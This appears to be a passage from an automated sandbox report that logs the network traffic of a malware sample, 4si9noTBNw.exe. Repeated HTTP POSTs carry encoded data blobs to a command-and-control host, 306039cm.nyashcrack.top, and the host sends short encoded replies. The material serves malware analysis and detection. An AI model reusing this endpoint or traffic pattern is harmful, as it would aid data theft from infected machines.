                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:35.872297049 CET1040OUTData Raw: 59 54 5b 55 5a 40 59 5b 5c 5c 56 57 50 5b 5b 5e 5f 50 59 54 56 59 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YT[UZ@Y[\\VWP[[^_PYTVYQ_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,T2^6\9_#7'9,(#38=5W4?U+?>,+:&^#,X +


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.44974137.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:36.498913050 CET344OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 161268
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:36.844135046 CET12360OUTData Raw: 5c 5a 5e 54 5f 41 5c 5e 5c 5c 56 57 50 51 5b 5f 5f 5d 59 58 56 5f 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \Z^T_A\^\\VWPQ[__]YXV_QVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#811!%Y4$%9=78Z3;!(%V4Y)(*'([?[(&^#,X
                                                                                              Dec 9, 2024 16:00:36.963741064 CET7416OUTData Raw: 0c 5b 59 5c 0b 2d 2c 34 2c 1d 3d 53 34 00 3f 40 3f 07 2b 5b 0f 29 1a 30 09 31 2f 3c 29 31 32 0b 03 3e 16 1f 3d 02 19 37 3c 07 25 0b 26 0a 01 14 04 04 14 2c 3c 1d 30 21 3e 3c 30 14 0d 2d 1c 18 26 3d 0a 2f 31 0a 23 5b 3d 21 01 18 32 2f 2a 1a 3d 01
                                                                                              Data Ascii: [Y\-,4,=S4?@?+[)01/<)12>=7<%&,<0!><0-&=/1#[=!2/*=:6 <;:X< V6(-#'W2=:Z$\<S4>$6!")]:6'62+0 7<\&;6"'9W6+E1(:598$\&:[<!305%%,89\)>B_!9)?9&9/*<>8$&3.[1)832 T?0,6 :\Y&!'="0
                                                                                              Dec 9, 2024 16:00:36.963803053 CET7416OUTData Raw: 0b 2d 3c 38 39 34 11 3d 3c 2e 5c 25 3b 3c 53 26 33 22 03 54 32 2c 0d 07 07 59 24 3c 08 2a 2c 21 08 0d 3c 58 3d 30 26 15 31 05 3c 12 22 07 02 1e 25 04 21 54 09 31 01 26 35 2a 1c 52 06 3f 1e 1c 0e 31 37 0f 3e 06 18 1e 15 5b 34 2c 26 42 5c 26 0a 21
                                                                                              Data Ascii: -<894=<.\%;<S&3"T2,Y$<*,!<X=0&1<"%!T1&5*R?17>[4,&B\&!^2!?"Y8$&7.7X$2&&,:<\#4#!$4#Z6:;5#2+)!_%\:[9+?51'"",0[!#<7CI-;Y10,?3RE;9$0</=!X[7?/[>V0#.4,7W%?WW52=WY
                                                                                              Dec 9, 2024 16:00:36.963917971 CET7416OUTData Raw: 2e 0d 59 12 02 08 04 15 23 07 5b 03 08 1d 09 2d 27 3e 5d 5c 0e 28 53 1a 2c 30 18 15 02 2d 57 29 2b 01 34 04 3d 02 2c 54 38 2e 3c 1a 3d 56 1c 12 29 3f 30 2a 21 5b 37 1d 3c 3c 13 54 24 57 2c 13 07 14 14 21 36 09 38 52 3f 04 2f 37 26 02 0b 59 3a 5a
                                                                                              Data Ascii: .Y#[-'>]\(S,0-W)+4=,T8.<=V)?0*![7<<T$W,!68R?/7&Y:Z$?8# 2"X^<'?=7.?*9""3:,;?97#T#61Z=^6$>2:+QB;8>4":Y<^;$=6Y_(7(=]&U4$2*E+T8\/--<:%-$\1X[&UW]6,&99(7#<
                                                                                              Dec 9, 2024 16:00:36.966630936 CET2472OUTData Raw: 02 33 25 59 3a 00 1d 0b 2f 54 33 2c 3c 2d 2d 35 0f 07 30 1a 30 0d 33 3c 3d 3d 23 18 24 3d 0e 1a 02 22 52 57 3d 3c 02 45 01 33 28 23 0f 2b 28 2c 32 1c 01 18 37 22 3a 29 28 10 4a 54 35 5a 09 10 3d 32 0f 2f 09 35 51 54 07 3d 04 15 01 55 43 30 0f 05
                                                                                              Data Ascii: 3%Y:/T3,<--5003<==#$="RW=<E3(#+(,27":)(JT5Z=2/5QT=UC039Z>.Q%C,9?'+";!!/'-2\?\,<:1%2:'!;V#8!- ]"45 [9R839X1-7^2*'+,!2<^#7([ $(=$3'613_+':?9:R>!(X3,$4%"81/*Q=2-
                                                                                              Dec 9, 2024 16:00:37.083858967 CET8652OUTData Raw: 0f 3e 21 10 01 28 44 35 24 03 3c 03 01 2f 08 59 32 38 38 02 06 34 49 03 0a 00 20 22 0a 0b 20 01 32 1e 29 39 05 2e 5f 38 0e 16 23 37 23 25 5f 02 3a 02 01 0b 35 2d 26 1e 39 05 5e 5f 3c 06 06 3f 0a 30 5a 5b 31 2e 1c 1e 3d 0b 35 03 32 3d 33 2d 28 56
                                                                                              Data Ascii: >!(D5$</Y2884I " 2)9._8#7#%_:5-&9^_<?0Z[1.=52=3-(V/!.2.WU=X?5(U<-!)9<'Z92(?3(',.3-*2C78_(9 X A,7[V5#T>/5U3(;+3T!Z?,'?% ?3>3\U"8=6Z>X]:?#%-*:0P<+8#"<1"9<*_;) ;9
                                                                                              Dec 9, 2024 16:00:37.083904982 CET1236OUTData Raw: 0f 3d 55 10 37 28 2d 38 24 20 2e 31 3b 07 00 5f 28 14 54 24 3c 21 1e 0a 33 57 2d 59 3e 36 2e 3c 3e 29 05 21 25 00 54 32 3f 1d 09 13 33 3a 22 24 32 29 29 19 23 2e 0f 15 37 28 3f 44 3e 2e 38 05 3f 3d 29 30 01 29 1a 3b 00 1c 35 19 3e 00 30 1b 3c 21
                                                                                              Data Ascii: =U7(-8$ .1;_(T$<!3W-Y>6.<>)!%T2?3:"$2))#.7(?D>.8?=)0);5>0<!+[2%9;E%46:^QR-*+-$+7/39\ZW, T ?6 &V&;'#42+<(#%0+<?+$. ;813!.YZ;,2V$ 6*( 7:73[0377:10G!9Z%$X.%$3Z1?
                                                                                              Dec 9, 2024 16:00:37.083914042 CET2472OUTData Raw: 28 26 31 1f 34 54 16 53 0e 59 37 34 3d 3c 0c 2d 3c 2d 2c 14 3d 38 23 31 3d 08 09 5a 33 58 26 41 0f 3e 35 39 3d 12 38 1c 21 13 22 1a 09 03 54 21 34 3a 2d 1f 08 57 2a 2d 24 2c 04 04 13 28 05 2d 3d 25 50 1c 37 0b 56 0e 0d 38 22 2e 0c 08 54 36 27 35
                                                                                              Data Ascii: (&14TSY74=<-<-,=8#1=Z3X&A>59=8!"T!4:-W*-$,(-=%P7V8".T6'5#)=8$<H=%9*,-<)??=$6V91*<"7&:8?.34]()#6</.!6(0:;55>Q;?=6[!=2_8R7=V#(3V49\&*><S4) 8?Y'Z2?>'35W9=5<8#$=T',1 6$7'
                                                                                              Dec 9, 2024 16:00:37.128724098 CET28428OUTData Raw: 3b 20 07 12 02 55 54 2c 24 20 0e 11 3f 20 32 03 32 54 22 1a 3a 05 0e 1e 36 32 3b 26 34 30 25 16 0c 2c 05 5c 0f 0c 01 09 26 2d 2c 1a 0e 07 0d 57 32 20 52 31 31 01 15 42 04 07 0a 3a 39 5c 15 1d 09 0c 27 02 37 32 3d 57 34 04 34 22 22 59 01 1d 32 3e
                                                                                              Data Ascii: ; UT,$ ? 22T":62;&40%,\&-,W2 R11B:9\'72=W44""Y2>,; /2I6/:!'>ZY$_::A?2W#;-]:=>Q8#(V]!&>Y_?!#X.]>> 9'(]?!$%7X:6 >AS)/297 ><(0)<)]@&021(&'/(,871:>#^.--
                                                                                              Dec 9, 2024 16:00:37.251404047 CET7416OUTData Raw: 21 20 2a 58 00 55 22 19 3a 3e 19 0e 39 08 05 38 30 31 36 5b 0d 3d 2f 5a 3f 20 50 50 09 23 33 00 08 2e 3f 11 2f 32 31 2a 02 32 02 04 3f 2f 20 33 30 29 34 2c 0f 56 30 1f 28 1f 17 1d 04 5b 2b 1e 3c 06 1d 34 27 2c 21 29 27 21 59 16 34 26 14 13 2b 0c
                                                                                              Data Ascii: ! *XU":>98016[=/Z? PP#3.?/21*2?/ 30)4,V0([+<4',!)'!Y4&+/[,&>Y<+.!76:/%\,._8 6&<08:%>%#U:#?88\!>7R/_2\#Q&0$*6-,#.V:''*;1?5(_0(I?((?23^ D'_+T!'"*#-Z!?"%>1)Z
                                                                                              Dec 9, 2024 16:00:37.770098925 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:38.803881884 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.44974237.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:36.664628029 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:37.015894890 CET1040OUTData Raw: 5c 5f 5e 56 5f 40 5c 5f 5c 5c 56 57 50 5c 5b 5f 5f 51 59 55 56 5f 51 59 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \_^V_@\_\\VWP\[__QYUV_QYXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#-"!:-"%^&/+7'^!\*.7>P+$C<>0**&^#,X 7
                                                                                              Dec 9, 2024 16:00:37.934995890 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:38.174645901 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:37 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.44974437.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:38.434356928 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:38.781555891 CET1040OUTData Raw: 59 5b 5b 52 5f 4a 5c 5c 5c 5c 56 57 50 5b 5b 5f 5f 5a 59 5c 56 58 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y[[R_J\\\\VWP[[__ZY\VXQ[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P C/T2\5:. ,\&)$R+$?'5=""<!<:(C+.'[*:&^#,X +
                                                                                              Dec 9, 2024 16:00:39.738765955 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:39.970696926 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.44974537.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:39.906934023 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1732
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:40.266098022 CET1732OUTData Raw: 5c 59 5b 54 5a 44 59 5a 5c 5c 56 57 50 5d 5b 5c 5f 5a 59 5b 56 5f 51 5d 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \Y[TZDYZ\\VWP][\_ZY[V_Q]XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P -2*]!)5#57'9V?'('(!])5W#)<:;?+&^#,X 3
                                                                                              Dec 9, 2024 16:00:41.185609102 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:41.418291092 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 27 0f 21 26 2c 00 21 2b 33 0a 2c 3d 3e 04 21 3f 2c 05 28 2e 01 16 24 33 02 06 2f 3f 22 13 36 0d 0f 03 2b 08 28 11 2b 08 2f 0c 23 35 21 5a 06 1e 25 13 27 5b 3c 57 39 22 2f 01 28 1f 32 17 23 00 28 04 24 20 3c 55 25 2f 28 58 30 3f 01 1b 2f 20 2e 1d 3d 00 3f 43 3c 01 28 06 27 2f 2b 53 0e 1f 23 02 29 31 2a 0a 2b 03 28 0c 22 59 2b 0f 31 07 29 09 26 31 3c 52 3f 14 32 0a 2a 23 3c 0b 20 2d 3f 09 32 05 2e 00 2b 3f 27 19 26 33 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: '!&,!+3,=>!?,(.$3/?"6+(+/#5!Z%'[<W9"/(2#($ <U%/(X0?/ .=?C<('/+S#)1*+("Y+1)&1<R?2*#< -?2.+?'&3 ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.44974637.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:40.221318960 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1024
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:40.579246044 CET1024OUTData Raw: 59 5c 5e 54 5f 47 59 5a 5c 5c 56 57 50 59 5b 59 5f 58 59 5c 56 5f 51 5e 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y\^T_GYZ\\VWPY[Y_XY\V_Q^XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,1:!*>#?17++&8*5:#?"T+((> +&^#,X '
                                                                                              Dec 9, 2024 16:00:41.492619991 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:41.726821899 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.44974837.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:41.997818947 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:42.344016075 CET1040OUTData Raw: 59 5c 5e 53 5f 4b 5c 58 5c 5c 56 57 50 5a 5b 5b 5f 5e 59 54 56 5d 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y\^S_K\X\\VWPZ[[_^YTV]Q\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#;]5:-Y 8]&+ [3!X(%1#/6P(9 <> *:&^#,X /
                                                                                              Dec 9, 2024 16:00:43.293565035 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:43.526642084 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:42 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.44975137.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:43.783799887 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:44.141036987 CET1040OUTData Raw: 59 55 5e 52 5a 43 5c 5b 5c 5c 56 57 50 5a 5b 5f 5f 5f 59 58 56 58 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YU^RZC\[\\VWPZ[___YXVXQXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P @;26]!\=46 [1<]$^=*"#/>U?:(D?-?(*&^#,X /
                                                                                              Dec 9, 2024 16:00:45.063651085 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:45.298460960 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:44 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.44975237.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:45.543610096 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:45.890894890 CET1040OUTData Raw: 59 5d 5b 56 5f 40 59 5e 5c 5c 56 57 50 58 5b 59 5f 5d 59 58 56 5c 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y][V_@Y^\\VWPX[Y_]YXV\Q[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;:6]78190V? &8*& +)$B>=,<&^#,X '


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.44975337.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:46.543173075 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1756
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:46.891196966 CET1756OUTData Raw: 59 58 5e 52 5f 4a 5c 5c 5c 5c 56 57 50 51 5b 50 5f 58 59 5b 56 5f 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YX^R_J\\\\VWPQ[P_XY[V_QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D,"" :7&: ?'+&(")&.S4>U(D>.8?&^#,X
                                                                                              Dec 9, 2024 16:00:47.819869041 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:48.054800987 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 24 55 36 26 09 13 20 38 06 57 2e 2d 26 03 22 05 20 05 28 3d 2c 03 31 23 27 16 2d 2f 39 0f 36 0d 0b 06 2b 0f 09 0a 3e 21 37 0e 23 35 21 5a 06 1e 25 11 33 2d 38 1e 3a 54 20 58 3f 08 32 5c 37 10 33 5d 33 0a 28 1c 31 01 2c 59 30 01 28 09 2f 1d 32 52 3e 3d 23 07 28 06 38 01 27 2f 2b 53 0e 1f 23 02 3d 1f 13 10 2b 5b 24 0f 21 3f 2f 0f 31 3e 29 0d 31 0c 2b 0d 2b 2a 3e 0f 28 20 3b 54 37 2e 28 14 32 2c 04 06 3c 3f 37 19 24 23 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: $U6& 8W.-&" (=,1#'-/96+>!7#5!Z%3-8:T X?2\73]3(1,Y0(/2R>=#(8'/+S#=+[$!?/1>)1++*>( ;T7.(2,<?7$# ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.44975937.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:46.745899916 CET342OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
